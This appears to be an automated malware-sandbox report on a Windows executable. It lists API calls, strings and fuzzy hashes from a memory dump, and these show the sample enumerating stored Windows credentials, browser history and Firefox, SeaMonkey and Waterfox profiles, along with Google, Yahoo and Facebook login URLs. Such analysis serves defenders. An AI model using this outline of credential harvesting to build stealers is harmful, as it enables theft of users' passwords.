                                                                                                                                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                • API String ID: 3883404497-2982631422
                                                                                                                                                                • Opcode ID: 7a425c56cbbf5b1cc2378a83f6cf72cfb2264681b451cc294af70ec841fe14a3
                                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                • Opcode Fuzzy Hash: 7a425c56cbbf5b1cc2378a83f6cf72cfb2264681b451cc294af70ec841fe14a3
                                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 509814883-3916222277
                                                                                                                                                                • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 823 41837f-4183bf 824 4183c1-4183cc call 418197 823->824 825 4183dc-4183ec call 418160 823->825 830 4183d2-4183d8 824->830 831 418517-41851d 824->831 832 4183f6-41840b 825->832 833 4183ee-4183f1 825->833 830->825 834 418417-418423 832->834 835 41840d-418415 832->835 833->831 836 418427-418442 call 41739b 834->836 835->836 839 418444-41845d CreateFileW 836->839 840 41845f-418475 CreateFileA 836->840 841 418477-41847c 839->841 840->841 842 4184c2-4184c7 841->842 843 41847e-418495 GetLastError ??3@YAXPAX@Z 841->843 846 4184d5-418501 memset call 418758 842->846 847 4184c9-4184d3 842->847 844 4184b5-4184c0 call 444706 843->844 845 418497-4184b3 call 41837f 843->845 844->831 845->831 851 418506-418515 ??3@YAXPAX@Z 846->851 847->846 851->831
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                • String ID: |A
                                                                                                                                                                • API String ID: 1407640353-1717621600
                                                                                                                                                                • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                • String ID: r!A
                                                                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                                                                • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                • API String ID: 62308376-4196376884
                                                                                                                                                                • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                • String ID: C:\Windows\system32
                                                                                                                                                                • API String ID: 669240632-2896066436
                                                                                                                                                                • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3191383707-0
                                                                                                                                                                • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                • API String ID: 4039892925-11920434
                                                                                                                                                                • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                • API String ID: 4039892925-2068335096
                                                                                                                                                                • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                • API String ID: 4039892925-3369679110
                                                                                                                                                                • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                                                                • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                • String ID: $0.@
                                                                                                                                                                • API String ID: 3030842498-1896041820
                                                                                                                                                                • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2941347001-0
                                                                                                                                                                • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
